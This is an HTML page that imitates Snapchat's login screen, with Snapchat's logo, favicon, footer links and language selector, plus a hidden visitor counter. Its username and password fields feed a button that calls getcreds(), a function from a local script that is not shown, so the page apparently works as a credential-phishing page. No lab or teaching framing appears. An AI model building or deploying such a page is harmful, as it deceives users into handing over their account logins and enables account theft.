<!DOCTYPE html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="Images/Snapchat-Logo-2013.png">
<script src="script/myjs.js"></script>
</head>
<!-- Start of StatCounter Code for Default Guide -->
<script type="text/javascript">
   var sc_project=11060036;
   var sc_invisible=1;
   var sc_security="15f5d4de";
   var scJsHost = (("https:" == document.location.protocol) ?
   "https://secure." : "http://www.");
   document.write("<sc"+"ript type='text/javascript' src='" +
   scJsHost+
   "statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript>
   <div class="statcounter"><a title="free hit
      counters" href="http://statcounter.com/free-hit-counter/"
      target="_blank"><img class="statcounter"
      src="//c.statcounter.com/11060036/0/15f5d4de/1/" alt="free
      hit counters"></a></div>
</noscript>
<!-- End of StatCounter Code for Default Guide -->
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300" rel="stylesheet" type="text/css">
<style>
   body {
   margin:0px;
   font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif;
   background-color: #262626;
   color:#fff;
   }
   a {
   cursor: pointer;
   }
   a {
   background: 0 0;
   color: #009fda;
   text-decoration: none;
   font-size:14px;
   }
</style>
<title>Log In - Snapchat</title>
<link rel="shortcut icon" type="image/png" href="https://accounts.snapchat.com/favicon.ico"/>
<body style="background-color: #edeef1;">
   <center>
   <img src="https://accounts.snapchat.com/accounts/static/images/ghost/ghost.svg" style="width:100px;padding-top:80px;padding-bottom:95px;">
   <font size="6px;" style="color: #000000;"><br>Log in to Snapchat</font><br>
   <style>
      .inputBox {
      font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif;
      margin: 0;
      outline: 0;
      -webkit-appearance: none;
      tap-highlight-color: rgba(255,255,255,0);
      line-height: 1.2142em;
      padding: .67861em 1em;
      font-size: 1em;
      background-color: #fff;
      border: 1px solid rgba(39,41,43,.15);
      color: rgba(0,0,0,.8);
      border-radius: .2857rem;
      box-shadow: 0 0 0 0 transparent inset;
      -webkit-transition: background-color .2s ease,color .2s ease,box-shadow .2s ease,border-color .2s ease;
      transition: background-color .2s ease,color .2s ease,box-shadow .2s ease,border-color .2s ease;
      width:304px;
      height:38px;
      margin-bottom:15px;
      font-size:14px;
      }
      button {
      cursor: pointer;
      display: inline-block;
      min-height: 1em;
      outline: 0;
      border: none;
      vertical-align: baseline;
      background-color: #fffc01;
      color: #262626;
      font-family: HelveticaNeue-Light,'Helvetica Neue Light','Helvetica Neue',Helvetica,Arial,'Lucida Grande',sans-serif;
      margin: 0 .25em 0 0;
      padding: 13px 1.5em;
      text-shadow: none;
      font-weight: 700;
      line-height: 1;
      font-style: normal;
      text-align: center;
      text-decoration: none;
      text-transform: uppercase;
      background-image: none;
      border-radius: 5px;
      box-shadow: 0 0 0 1px transparent inset,0 0 0 0 rgba(39,41,43,.15)inset;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
      user-select: none;
      -webkit-transition: opacity .1s ease,background-color .1s ease,color .1s ease,box-shadow .1s ease,background .1s ease;
      transition: opacity .1s ease,background-color .1s ease,color .1s ease,box-shadow .1s ease,background .1s ease;
      will-change: '';
      -webkit-tap-highlight-color: transparent;
      width:304px;
      height:38px;
      }
      button:hover {
      background-color: #F4F100;
      }
   </style>
    <input class="inputBox" id="username" name="username" type="text" placeholder="Username" style="margin-top:20px;"><br>
    <input class="inputBox" id="passwd" name="password" type="password" placeholder="Password"><br>
    <button class="button" type="submit" style="margin-top:5px;" onclick=getcreds()>LOG IN</button>
   <a href="#" style="display: block;margin-top: 10px;">Forgot your password?</a>
   </div>
   <div class="footer"><div style="background-color: rgb(248, 249, 251); font-size: 14px; line-height: 17px;bottom:-500px;position: relative;">
    <style>
      .footer-container,
      .footer-bottom-bar {
        width: 92.3%;
        max-width: 1070px;
        margin: auto;
      }

      .footer-container {
        box-sizing: content-box;
        position: relative;
        padding: 30px 0 30px;
        min-height: 195px;
      }

      .footer-container .footer-column {
        position: relative;
        box-sizing: border-box;
        float: left;
        width: 25%;
        padding-inline-end: 6.25%;
      }

      [dir="rtl"] .footer-container .footer-column {
        float: right;
      }

      .footer-container .footer-column .footer-column-header {
        box-sizing: content-box;
        color: rgba(0,0,0,.87);
        line-height: 23px;
        font-weight: 500;
      }

      .footer-container .footer-column .footer-column-expand-caret {
        display: none;
      }

      .footer-container .footer-column a {
        display: table;
        color: rgba(0,0,0,.87);
        text-decoration: none;
        line-height: 17px;
        margin-top: 6px;
      }
      .footer-container .footer-column a:hover {
        color: black;
      }

      .footer-container .langue-selection-block {
        position: absolute;
        box-sizing: border-box;
        padding-block-start: 0;
        padding-block-end: 15px;
        padding-inline-start: 0;
        padding-inline-end: 6.25%;
        bottom: 15px;
        width: 25%;
      }
      .footer-container .langue-selection-block .langue-header {
        color: rgba(0,0,0,.87);
        font-weight: 500;
      }

      .footer-bottom-bar a {
        line-height: 56px;
        margin-inline-end: 40px;
        color: white;
        text-decoration: none;
      }

      @media (max-width: 767px) {
        .footer-container,
        .footer-bottom-bar {
          width: 100%;
          padding: 0;
          max-width: none;
        }

        .footer-container .footer-column {
          padding: 0;
          width: 100%;
        }

        .footer-container .footer-column a,
        .footer-container .footer-column .footer-column-header {
          margin-top: 0;
          padding: 10px 40px;
          width: calc(100% - 80px);
          line-height: 25px;
        }

        .footer-container .footer-column .footer-column-header,
        .footer-container .langue-selection-block {
          border-top: solid 1px #D4D4D4;
        }

        .footer-container .footer-column .footer-column-header {
          cursor: pointer;
          background-color: #F8F9FB;
        }

        .footer-container .footer-column .footer-column-expand-caret {
          display: block;
          position: absolute;
          inset-inline-start: 16px;
          top: 15px;
          width: 15px;
          height: 20px;
          transform-origin: 55% 45%;
          cursor: pointer;
        }
        .footer-container .footer-column.expanded .footer-column-expand-caret {
          transform: rotate(90deg);
          -webkit-transform: rotate(90deg);
        }

        .footer-container .footer-column a {
          font-weight: 600;
          color: rgba(0,0,0,.87);
          border-top: solid 1px #E5E5E5;
          display: none;
        }
        .footer-container .footer-column.expanded a {
          display: block;
          box-sizing: content-box;
        }

        .footer-container .langue-selection-block {
          position: static;
          width: 100%;
          height: inherit;
          top: inherit;
          padding: 14px 20px 15px;
        }

        .footer-bottom-bar a {
          display: block;
          line-height: 45px;
          margin-right: 0;
          padding-inline-start: 20px;
          border-bottom: solid 1px #D4D4D4;
        }
      }
    </style>
    <div class="footer-container" id="footerContainer" style="position: relative;"><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Company</div><div><a href="#">Snap Inc.</a><a href="#">Careers</a><a href="#">News</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Community</div><div><a href="#">Support</a><a href="#">Community Guidelines</a><a href="https://snap.com/en-GB/safety/safety-center">Safety Centre</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Advertising</div><div><a href="https://forbusiness.snapchat.com/?utm_source=accounts_snapchat_com&amp;utm_medium=referral&amp;utm_campaign=internal_referral&amp;utm_content=footer_link">Buy Adverts</a><a href="https://snap.com/en-GB/ad-policies/">Advertising Policies</a><a href="https://snap.com/en-GB/political-ads/">Political Ads Library</a><a href="https://snap.com/en-GB/brand-guidelines/">Brand Guidelines</a><a href="https://help.snapchat.com/hc/articles/7047502545044?utm_source=web&amp;utm_medium=snap&amp;utm_campaign=ap">Promotions Rules</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20" fill="rgba(0,0,0,.87)"><g><rect stroke="rgba(0,0,0,.87)" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="rgba(0,0,0,.87)" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Legal</div><div><a href="https://snap.com/en-GB/privacy/privacy-center/">Privacy Centre</a><a href="https://help.snapchat.com/hc/articles/11399265637012?utm_source=snapchat_com&amp;utm_medium=global_footer&amp;utm_campaign=privacy_choices">Your Privacy Choices</a><a href="https://snap.com/en-GB/cookie-policy/">Cookie Policy</a><a href="https://help.snapchat.com/hc/articles/7012332110996?utm_source=web&amp;utm_medium=snap&amp;utm_campaign=ap">Report Infringement</a><a href="https://snap.com/en-GB/terms/custom-creative-tools/">Custom Creative Tools Terms</a><a href="https://snapchat.com/create/terms.html">Community Geofilter Terms</a><a href="https://snap.com/en-GB/terms/lens-studio-license-agreement">Lens Studio Terms</a></div></div><div style="clear: both;"></div><div class="langue-selection-block"><div class="langue-header">Language</div><div style="position: relative;"><select id="sc-global-locale-selector" style="appearance: none; border: 1px solid rgb(204, 204, 204); border-radius: 5px; background: white; width: 100%; margin-top: 10px; padding: 5px 10px; font-size: 14px; font-family: inherit; color: rgba(0, 0, 0, 0.6); height: 34px; cursor: pointer;"><option value="ar">العَرَبِية</option><option value="bn-BD">বাংলা(বাংলাদেশ)</option><option value="bn-IN">বাংলা (ভারত)</option><option value="da-DK">Dansk</option><option value="de-DE">Deutsch</option><option value="el-GR">Ελληνικά</option><option value="en-GB">English (UK)</option><option value="en-US">English (US)</option><option value="es">Español</option><option value="es-AR">Español (Argentine)</option><option value="es-ES">Español (España)</option><option value="es-MX">Español (México)</option><option value="fi-FI">Suomi</option><option value="fil-PH">Filipino</option><option value="fr-FR">Français</option><option value="gu-IN">ગુજરાતી</option><option value="hi-IN">हिंदी</option><option value="id-ID">Bahasa Indonesia</option><option value="it-IT">Italiano</option><option value="ja-JP">日本語</option><option value="kn-IN">ಕನ್ನಡ (India)</option><option value="ko-KR">한국어</option><option value="ml-IN">മലയാളം</option><option value="mr-IN">मराठी</option><option value="ms-MY">Bahasa Melayu</option><option value="nb-NO">Norsk</option><option value="nl-NL">Nederlands</option><option value="pa">ਪੰਜਾਬੀ</option><option value="pl-PL">Polski</option><option value="pt-BR">Português (Brasil)</option><option value="pt-PT">Português (Portugal)</option><option value="ro-RO">Română</option><option value="ru-RU">Русский</option><option value="sv-SE">Svenska</option><option value="ta-IN">தமிழ்</option><option value="te-IN">తెలుగు</option><option value="th-TH">ภาษาไทย (ประเทศไทย)</option><option value="tr-TR">Türkçe</option><option value="ur-PK">اردو</option><option value="vi-VN">Tiếng Việt</option><option value="zh-Hans">中文（简体）</option><option value="zh-Hant">中文（繁體）</option></select><div style="position: absolute; inset-inline-end: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 18px; border-width: 0px 3px 5px; border-color: transparent transparent rgb(102, 102, 102);"></div><div style="position: absolute; inset-inline-end: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 10px; border-width: 5px 3px 0px; border-color: rgb(102, 102, 102) transparent transparent;"></div></div></div></div><div style="background-color: rgb(38, 38, 38);"><div class="footer-bottom-bar"><a href="https://snap.com/en-GB/privacy/privacy-policy/">Privacy Policy</a><a href="https://snap.com/en-GB/terms/">Terms of Service</a><div style="clear: both;"></div></div></div></div></div>
</body>